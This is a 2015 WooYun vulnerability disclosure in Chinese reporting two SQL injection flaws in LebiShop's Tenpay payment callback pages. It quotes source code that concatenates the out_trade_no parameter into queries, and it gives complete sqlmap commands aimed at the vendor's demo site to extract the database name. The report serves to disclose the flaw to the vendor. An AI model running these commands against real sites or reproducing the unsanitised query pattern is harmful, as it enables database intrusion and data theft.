当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099181

漏洞标题:LebiShop系统sql注入三(两处注入)

相关厂商:www.lebi.cn

漏洞作者: hello

提交时间:2015-03-05 11:14

修复时间:2015-06-08 11:17

公开时间:2015-06-08 11:17

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-24: 细节向实习白帽子公开
2015-06-08: 细节向公众公开

简要描述:

LebiShop商城系统最新版SQL注入二 四处 官方demo演示

详细说明:

注入一

http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx


源码如下

protected void Page_Load(object sender, EventArgs e)
{
string where = base.Request["out_trade_no"]; //没处理
Lebi_Order model = B_Lebi_Order.GetModel(where); //跟进
if (model == null)
{
base.Response.Write("系统错误");
base.Response.End();
}
else
{
TenpayUtil util = new TenpayUtil(model);
ResponseHandler handler = new ResponseHandler(this.Context);
....
public Lebi_Order_Log GetModel(string strWhere)
{
if (strWhere.IndexOf("lbsql{") > 0)
{
SQLPara para = new SQLPara(strWhere, "", "");
return this.GetModel(para);
}
StringBuilder builder = new StringBuilder();
builder.Append("select top 1 * from [Lebi_Order_Log] ");
builder.Append(" where " + strWhere); //strWhere 没处理存在注入
Lebi_Order_Log log = new Lebi_Order_Log();
DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString());
if (set.Tables[0].Rows.Count <= 0)
{
return null;
}
if (set.Tables[0].Rows[0]["id"].ToString() != "")
{
log.id = int.Parse(set.Tables[0].Rows[0]["id"].ToString());
}
if (set.Tables[0].Rows[0]["Order_id"].ToString() != "")
{
log.Order_id = int.Parse(set.Tables[0].Rows[0]["Order_id"].ToString());
}
if (set.Tables[0].Rows[0]["User_id"].ToString() != "")
{
log.User_id = int.Parse(set.Tables[0].Rows[0]["User_id"].ToString());
}
if (set.Tables[0].Rows[0]["Admin_id"].ToString() != "")
{
log.Admin_id = int.Parse(set.Tables[0].Rows[0]["Admin_id"].ToString());
}
log.Admin_Name = set.Tables[0].Rows[0]["Admin_Name"].ToString();
log.Content = set.Tables[0].Rows[0]["Content"].ToString();
if (set.Tables[0].Rows[0]["Time_Add"].ToString() != "")
{
log.Time_Add = DateTime.Parse(set.Tables[0].Rows[0]["Time_Add"].ToString());
}
return log;
}


注入二

http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx


protected void Page_Load(object sender, EventArgs e)
{
string where = base.Request["out_trade_no"]; //没处理
Lebi_Order model = B_Lebi_Order.GetModel(where);//跟进
if (model == null)
{
base.Response.Write("系统错误");
base.Response.End();
}
else
{
TenpayUtil util = new TenpayUtil(model);
ResponseHandler handler = new ResponseHandler(this.Context);
handler.setKey(util.tenpay_key);
if (handler.isTenpaySign())


public Lebi_Order GetModel(string strWhere)
{
if (strWhere.IndexOf("lbsql{") > 0)
{
SQLPara para = new SQLPara(strWhere, "", "");
return this.GetModel(para);
}
StringBuilder builder = new StringBuilder();
builder.Append("select top 1 * from [Lebi_Order] ");
builder.Append(" where " + strWhere); //存在注入了
Lebi_Order order = new Lebi_Order();
DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString());
if (set.Tables[0].Rows.Count <= 0)

漏洞证明:

注入一
sqlmap扫描

sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10


555.png


556.png


第二处注入
sqlmap扫描

sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10


557.png


558.png

修复方案:

对参数进行处理

版权声明:转载请注明来源 hello@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-08 11:17

厂商回复:

最新状态:

暂无